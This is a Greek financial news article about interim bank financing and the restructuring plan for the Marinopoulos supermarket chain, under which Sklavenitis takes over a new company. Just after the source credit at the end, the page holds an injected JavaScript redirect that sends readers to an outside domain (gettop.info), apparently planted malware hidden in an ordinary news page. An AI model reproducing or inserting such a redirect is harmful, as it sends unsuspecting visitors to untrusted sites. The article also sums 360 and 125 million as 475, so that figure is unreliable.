Εκταμιεύτηκαν τα πρώτα κεφάλαια για τη Μαρινόπουλος

0
6

 

Στα ταμεία της εταιρίας τα πρώτα χρήματα από την ενδιάμεση χρηματοδότηση των τραπεζών στο πλαίσιο του σχεδίου διάσωσης.

Εξοφλήθηκαν σήμερα οι μισθοί των εργαζομένων της Μαρινόπουλος ΑΕ για τους μήνες Ιούλιο και Αύγουστο από την προχρηματοδότηση που έλαβε η εταιρεία ύψους 10 εκατ. ευρώ και πρόκειται να ακολουθήσουν οι ιδιοκτήτες των ακινήτων.

Το επόμενο στάδιο θα είναι η εκδίκαση της αίτησης αναδιάρθρωσης με βάση το άρθρο 106β και που θα γίνει στο τέλος Σεπτεμβρίου. Προϋπόθεση για να ολοκληρωθεί η λήψη και της έγκρισης από την Επιτροπή Ανταγωνισμού.

Το σχέδιο προβλέπει τη δημιουργία μιας νέας εταιρείας με νέο ΑΦΜ και αξίζει να σημειωθεί ότι οι τράπεζες έχουν το δικαίωμα να αποκτήσουν το 25% της «νέας Μαρινόπουλος» στην τιμή του αρχικού μετοχικού κεφαλαίου και παράλληλα έχουν δικαίωμα να πουλήσουν πίσω στην Σκλαβενίτη το ποσοστό που θα έχουν αποκτήσει σε προκαθορισμένη τιμή σε πολυετές βάθος.

Εφόσον οι τράπεζες ασκήσουν το δικαίωμά τους να αποκτήσουν μετοχές της νέας Μαρινόπουλος και έχουν προηγηθεί αυξήσεις κεφαλαίου, το ποσοστό που θα μπορούν να αποκτήσουν θα μειώνεται ανάλογα.

Ενδιάμεση χρηματοδότηση

Σύμφωνα με πληροφορίες, η ενδιάμεση χρηματοδότηση είναι 80 εκατ. ευρώ.

Αναλυτικά:

* Η ευρύτερη οικογένεια Μαρινόπουλου παρείχε εγγυήσεις ύψους 10 εκατ. ευρώ με ακίνητα προκειμένου να ληφθεί ισόποσο δάνειο από την υφιστάμενη Μαρινόπουλος, το οποίο θα αποπληρωθεί από τη νέα Μαρινόπουλος και τότε οι εγγυήσεις επιστραφούν.

* Η Σκλαβενίτης βάζει 15 εκατ. ενδιάμεση χρηματοδότηση αποκλειστικά για αγορά εμπορευμάτων από τη Μαρινόπουλος και

* προσέφερε στις τράπεζες εγγυήσεις 15 εκατ. ευρώ προκειμένου ταυτόχρονα να δοθούν συνολικά από τις τράπεζες 55 εκατ. ευρώ.

Στη νέα εταιρεία που δημιουργείται και η οποία θα ελέγχεται μετοχικά κατά 100% από τη Σκλαβενίτης. Θα μεταφερθούν οι συμβάσεις όλων εργαζόμενων στην νυν Μαρινόπουλος και ταυτόχρονα όλες οι συμβάσεις leasing και μισθωμάτων, οι οποίες και δεν θα υποστούν κούρεμα.

Σε ότι αφορά τους προμηθευτές θα μεταφερθεί το 50% των πιστωτικών υπολοίπων. Ειδικά σε ότι αφορά τους προμηθευτές με μικρά υπόλοιπα, ως 100.000 ευρώ θα καταβληθεί προσπάθεια να μεταφερθεί το σύνολο της απαίτησης ώστε να αποφευχθεί το «κούρεμα».

Για τις υποχρεώσεις προς Ασφαλιστικά Ταμεία και ΟΤΑ προβλέπεται η μεταφορά στη νέα εταιρεία, η διαγραφή των προστίμων και η ρύθμιση σε 250 μηνιαίες δόσεις.

Οι τράπεζες συμφώνησαν να δανειοδοτήσουν τη νέα εταιρεία με 360 εκατ. ευρώ. Το δάνειο θα είναι δεκαετές balloon (το μεγαλύτερο μέρος θα εξοφληθεί στη λήξη), με επιτόκιο μόλις 1,5%, καθώς οι τράπεζες θα έχουν το δικαίωμα να το κεφαλαιοποιήσουν, αποκτώντας το 25% του μετοχικού κεφαλαίου της νέας εταιρείας.

Τα 475 εκατ. ευρώ (360 εκατ. δανεισμός και 125 εκατ. που θα βάλει η Σκλαβενίτης) θα χρησιμοποιηθούν από τη νέα εταιρεία για κεφάλαιο κίνησης και εξόφληση μέρους των υποχρεώσεών της προς προμηθευτές.

Πηγή: Euro2day.gr setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here